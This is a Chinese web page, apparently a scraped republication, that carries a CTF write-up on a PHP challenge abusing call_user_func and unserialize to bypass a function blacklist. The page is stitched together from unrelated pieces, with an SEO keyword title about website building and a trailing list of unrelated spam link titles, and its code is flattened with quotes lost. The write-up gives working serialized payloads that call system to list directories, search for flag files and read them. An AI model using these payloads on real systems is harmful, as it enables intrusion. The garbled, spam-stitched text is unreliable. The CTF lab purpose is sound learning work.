当前位置: 首页 > news >正文

网站建设视频教程推荐深圳做网站制作

news 2025/12/17 6:27:09
网站建设视频教程推荐,深圳做网站制作,wordpress站点语言,做健身网站步骤打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去#xff0c;func和p 我们需要猜测func和p两个参数之间的关系#xff0c;可以用php函数MD5测一下看看 我们在响应处得到了一串密文#xff0c;md5解密一下看看 发…打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去func和p 我们需要猜测func和p两个参数之间的关系可以用php函数MD5测一下看看 我们在响应处得到了一串密文md5解密一下看看 发现页面回响的内容就是123的md5加密后的内容 那我们直接看看能不能执行system函数 可以看到system函数被过滤掉了 那我们尝试一下能不能直接读取到网站源代码 file_get_contents() 得到 代码如下 ?php$disable_fun array(exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg,assert,substr_replace,call_user_func_array,call_user_func,array_filter, array_walk, array_map,registregister_shutdown_function,register_tick_function,filter_var, filter_var_array, uasort, uksort, array_reduce,array_walk, array_walk_recursive,pcntl_exec,fopen,fwrite,file_put_contents);function gettime($func, $p) {$result call_user_func($func, $p);$a gettype($result);if ($a string) {return $result;} else {return ;}}class Test {var $p Y-m-d h:i:s a;var $func date;function __destruct() {if ($this-func ! ) {echo gettime($this-func, $this-p);}}}$func $_REQUEST[func];$p $_REQUEST[p];if ($func ! null) {$func strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die(Hacker...);}}? 我们代码审计一下 $func $_REQUEST[func];     $p $_REQUEST[p];     if ($func ! null) {                   //判断func不为空         $func strtolower($func);     //将func转换为小写         if (!in_array($func,$disable_fun)) {     //搜索func是否含有黑名单的值             echo gettime($func, $p);           //如果func没有存在黑名单的值就执行gettime函数         }else {             die(Hacker...);             //有则输出Hacker function gettime($func, $p) {         $result call_user_func($func, $p);        //这里可以看出是回调函数         $a gettype($result);                      //这里用gettype函数对result处理后赋值给a         if ($a string) {                            //如果a的类型是字符串             return $result;                               //返回reslut的结果         } else {return ;}                            //否则返回空值 那咱们就可以使用反序列化因为我们这个命令是用不了的func有很多黑名单限制 构造payload ?php class Test {var $p ls;var $func system; } $a new Test(); echo serialize($a); ?用phpstudy打开得到payload payload为 funcunserializepO:4:Test:2:{s:1:p;s:2:ls;s:4:func;s:6:system;} 得到 修改payload funcunserializepO:4:Test:2:{s:1:p;s:4:ls /;s:4:func;s:6:system;} 还是没找到flag 继续修复payload其中 flag* 是一个通配符表示以 flag 开头的文件名。 funcunserializepO:4:Test:2:{s:1:p;s:18:find / -name flag*;s:4:func;s:6:system;} 直接读取flag funcunserializepO:4:Test:2:{s:1:p;s:22:cat /tmp/flagoefiu4r93;s:4:func;s:6:system;} 或者readfile funcreadfilep/tmp/flagoefiu4r93 知识点 读取网站源代码的函数有 file_get_contents() show_source() highlight_file() strtolower()函数 在PHP中字符串函数strtolower () 将字符串转化为小写 in_array()函数 in_array() 函数搜索数组中是否存在指定的值。 call_user_func函数 call_user_func — 把第一个参数作为回调函数调用 详情参考PHP: call_user_func - Manual gettype函数 gettype()函数必须先给它传递一个变量。它将确定变量的类型并且返回一个包含类型名称的字符串bool、int、double、string、array、object和resource。如果变量类型不是标准类型之一该函数就会返回“ unknown type未知类型”。 读取文件内容的命令 cat filename readfile filename 查找文件的命令 详情见Linux下查找文件find、grep命令_linux查找文件_GG_Bond19的博客-CSDN博客 find 路径 -name 文件名 例如 find / -name flag* 其中 flag* 是一个通配符表示以 flag 开头的文件名。 find / -name .*txt 其中 .*txt 是一个通配符表示以 .txt 结尾的隐藏文件
http://www.w-s-a.com/news/796360/

相关文章:

  • 国外买域名的网站廊坊网站制作网页
  • 抚顺市城市建设档案馆网站制作网页时经常用的一种动态位图格式是
  • 公司网站站群是什么运营网站
  • 昆明网站建设大全安徽教育机构网站建设
  • 广州网站排名怎么优化中华衣柜网
  • 怎样围绕网站专题发展来做ppt城乡住建局官网
  • 安卓手机app制作关键词优化公司
  • 江苏固茗建设有限公司网站深圳网站建设深圳网
  • 高性能网站建设指南北京城乡建设官方网站
  • 企业网站找谁做做淘宝相关网站
  • 商业网站网站建设wordpress关闭前端公共库
  • 打开山东城市建设职业学院网站下载了wordpress后
  • 四川网站建设设计城乡建设网站证件查询系统
  • 企业邮箱哪里买栾城seo整站排名
  • 长沙网站建设zh68网页制作技术实训报告
  • 电商网站的功能手机广告设计与制作软件
  • 做网站前端需要编程基础吗杭州市住房和城乡建设局
  • 网站开发一般学多久网站建设投标方案
  • 北京网站建设报价表制作短视频的软件有哪些
  • 长沙企业网站开发西安建设公司网站
  • 做图的兼职网站网站开发用了哪些知识要点
  • php网站怎么做静态化微慕wordpress插件
  • 电商营业执照wordpress利于seo
  • 那些网站主做玄幻小说营销策略都有哪些方面
  • 同一源代码再建设一个网站建立网站免费
  • 网站更换服务器影响做seo必须有网站吗
  • 免费网页模板网站php微信微网站怎么做
  • 网站的优点和缺点腾讯企点是什么软件
  • 谷歌英文网站推广网页设计好看的网站
  • 衡水网站建设集团各大网站注册